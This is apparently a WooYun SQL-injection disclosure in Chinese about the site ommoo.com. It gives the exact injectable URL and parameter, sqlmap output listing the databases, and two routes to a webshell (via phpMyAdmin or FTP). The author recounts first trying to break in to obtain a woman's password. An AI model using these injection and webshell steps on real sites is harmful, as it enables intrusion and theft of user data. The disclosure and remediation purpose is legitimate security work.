[公开漏洞]魔法桌面主站注入15万用户数据及分站全部沦陷

来源：WooYun　浏览：927次　时间：2014-05-07

魔法桌面主站注入15万用户数据及分站全部沦陷相关厂商：魔法桌面漏洞作者：李旭敏提交时间：2014-03-21 18:46 公开时间：2014-05-05 18:46 漏洞类型：SQL注射漏洞危害等级：高自评Rank：20 漏洞状态：未联系到厂商或者厂商积极忽略漏洞来源：http://www.wooyun.org Tags标签：第三方不可信程序 php+数字类型注射后台被猜解漏洞详情披露状态：

2014-03-21：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-05-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

嗯~终于能发一个有点质量的漏洞了，感谢来自星星的肉肉~谢谢你的奇葩sqlmap差点让我以为是个误报····目测这个CMS是属于通用型的

详细说明：

老实说，这网站我拿了一年···

当年为了泡到一个妹纸，想拿下该网站权限以取得她的常用密码。

当年各种扫描，google hack ，xss,社工，一个星期左右就放弃了。

一年后的今天，她早已贵为人妻····

大概看了看，是php的，然后后台地址是http://www.ommoo.com/admin/index.php?m=Public&a=login````注入在http://www.ommoo.com/u.php?action=prettify&uid=177071这里and 1=1 和and 1=2就能看出变化。丢入sqlmap跑跑···得到

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0

[15:35:52] [INFO] fetching database names

[15:35:52] [INFO] the SQL query used returns 8 entries

[15:35:52] [INFO] resumed: information_schema

[15:35:52] [INFO] resumed: ftpusers

[15:35:52] [INFO] resumed: ms

[15:35:52] [INFO] resumed: mysql

[15:35:52] [INFO] resumed: test

[15:35:52] [INFO] resumed: w3_ommoo_com

[15:35:52] [INFO] resumed: wbl

[15:35:52] [INFO] resumed: zol_wbl

available databases [8]:

[*] ftpusers

[*] information_schema

[*] ms

[*] mysql

[*] test

[*] w3_ommoo_com

[*] wbl

[*] zol_wbl

.jpg

找到myssql，是root权限。

里面还有FTP的数据库，旁站可能有FTP管理器之类的···

FTP管理.jpg

还有phpmyadmin~~

PHP探针.jpg

拿下webshell很简单，有两种方法，根据两张图所诉的物理连接，通过注入拿到phpmyadmin的密码，然后导出webshell··

第二种直接通过ftp管理添加帐号密码，然后上传个webshell。

.jpg

可以看到全部分站都在，可写可读···

接下来就是用户数据``还好没有明文保存，话说我连我自己的密码都忘记了。

打上个LOGO把··防止某些黑客拿截图去骗钱···

可以看到含有f的是男的，含有m的是女生把。

至于邮箱和密码一长串字符的，那些我估计应该是微博帐号或者QQ帐号绑定的。

随便登陆一个官方帐号试试···

.jpg

漏洞证明：

我很好奇你们用的是什么CMS··

是巧合么，呵呵~

构造关键字能找到一些模版相似的网站，没测试是否存在漏洞

修复方案：

我要是你的话，先弄个CDN，隐藏掉真实的IP。

然后下载个啊D的查杀工具，定时查杀webshell。

或者装过安全狗，查杀效果，不够啊D的webshell kill好，两者结合更佳。

接着删除掉phpinfo,p.php探针啊，之类的文件。

改一下后台目录。（妈蛋，那个真的后台么，为毛我有正确的密码登陆不进去··？）

过滤注入语句，比如 and 1=2这些基础过滤掉要做好啦

:) 有必要说一句，